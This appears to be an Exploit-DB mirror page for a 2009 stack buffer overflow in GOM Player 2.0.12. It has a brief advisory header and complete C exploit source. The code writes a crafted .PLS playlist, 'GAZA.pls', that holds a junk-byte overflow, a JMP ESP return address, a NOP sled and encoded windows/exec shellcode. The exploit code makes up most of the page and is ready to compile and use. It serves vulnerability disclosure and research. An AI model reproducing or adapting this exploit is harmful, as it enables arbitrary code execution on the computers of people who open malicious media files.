header-logo
Suggest Exploit
vendor:
GOM Player
by:
Mountassif Moad
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: GOM Player
Affected Version From: 2.0.12
Affected Version To: 2.0.12
Patch Exists: YES
Related CWE: N/A
CPE: a:gomlab:gom_player:2.0.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit

GOM Player 2.0.12 is vulnerable to a buffer overflow vulnerability when processing specially crafted .PLS files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This exploit was discovered and exploited by Mountassif Moad and was reported by Parvez Anwar in Secuina. The vulnerability Poc was reported by Parvez Anwar in Secuina and was exploited by DATA_SNIPER in milw0rm. This exploit is a new exploit for .PLS files and was inspired by DATA_SNIPER.

Mitigation:

Upgrade to the latest version of GOM Player.
Source

Exploit-DB raw data:

/*------------------------------------------------
*  GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit
*-------------------------------------------------
* Discoverd & Exploited:Mountassif Moad
* http://v4-Team.com & v4 Team & Evil Finger
* Stack(at)hotmail(dot).fr
*
* NOTIFICATION:
* The vulnerabilty Poc was reported by Parvez Anwar in Secuina http://secunia.com/advisories/23994
* by (.ASX) file after that DATA_SNIPER exploit it in http://www.milw0rm.com/exploits/7702
* and this a news exploit for (.PLS) file Exploited By Stack idea of exploit inspired from DATA_SNIPER
*  Thnx all friends
*/
#include <stdio.h>
#include <windows.h>
unsigned char Header1[] =  /*PLS Fist sentence format HEx 16 Bit */
"\x5b\x70\x6c\x61\x79\x6c\x69\x73\x74\x5d"
"\x0d\x0a\x0d\x0a\x4e\x75\x6d\x62\x65\x72"
"\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d"
"\x31\x0d\x0a\x0d\x0a\x46\x69\x6c\x65\x31"
"\x3d\x68\x74\x74\x70\x3a\x2f\x2f";;
unsigned char Header2[] ="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20";
/*windows/exec - 144 bytes,Encoder: CMD=calc*/
unsigned char Shell[] =
"\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
"\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
"\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
"\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
"\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
"\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
"\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
"\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
"\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
"\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43";
int main( int argc, char **argv ) {
char payload[4563];
char junk[4171];
unsigned char RET_Univ[] = "\x5D\x38\x82\x7C"; // JMP ESP in GOM.exe this make it universal
/*This is RET_sp2 FR = "\x5D\x38\x82\x7C" /*  JMP ESP in kernel32.dll XP SP2 fr */
unsigned char nop[] = "\x90\x90\x90\x90\x90\x90\x90\x90"; //Nops
FILE *f;
printf("GOM Player 2.0.12 (.pls) Universal Buffer Overflow Exploit\r\n");
printf("---------------------------------------------------\r\n");
memset(junk, 0x41, 4171);
printf("[_] Building Exploit..\r\n");
memcpy( payload, Header1, sizeof( Header1 ) - 1 );
memcpy( payload + sizeof( Header1 ) - 1, junk, 4172 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)-1, RET_Univ, 4 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)-2, nop, sizeof(nop)-1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(nop)+sizeof(RET_Univ)-3, Shell, sizeof( Shell ) - 1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)+sizeof(nop)+ sizeof(Shell)-4, Header2, sizeof( Header2 ) - 1 );
f = fopen( "GAZA.pls", "wb" );
if ( f == NULL ) {
printf("[_] Cannot create file\n");
return 0;
}
fwrite( payload, 1, sizeof(payload) , f );
fclose( f );
    printf("[_] GAZA.Pls file Created,Credit: Stack :)\r\n");
return 0;
}

// milw0rm.com [2009-01-30]

Navigation

Suggest Exploit

Services By CQR